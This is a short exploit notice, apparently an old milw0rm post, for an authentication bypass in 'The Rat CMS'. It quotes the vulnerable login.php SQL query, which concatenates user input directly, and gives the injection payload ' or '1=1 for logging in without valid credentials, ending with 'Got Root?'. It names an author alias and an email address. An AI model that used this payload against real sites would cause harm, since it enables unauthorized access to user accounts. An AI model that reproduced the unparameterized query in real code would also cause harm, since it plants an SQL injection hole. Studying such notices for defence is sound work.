19 lines
No EOL
466 B
Text
19 lines
No EOL
466 B
Text
---------------------------------
|
|
The Rat Cms Auth By Pass
|
|
---------------------------------
|
|
Autore: x0r
|
|
Email: andry2000@hotmail.it
|
|
--------------------------------
|
|
Bug In: \login.php
|
|
|
|
$sql = "SELECT user_id
|
|
FROM tbl_auth_user
|
|
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";
|
|
|
|
$result = mysql_query($sql) or die('Query failed. ' . mysql_error());
|
|
|
|
Exploit: ' or '1=1
|
|
|
|
^^ Got Root?
|
|
|
|
# milw0rm.com [2008-12-15] |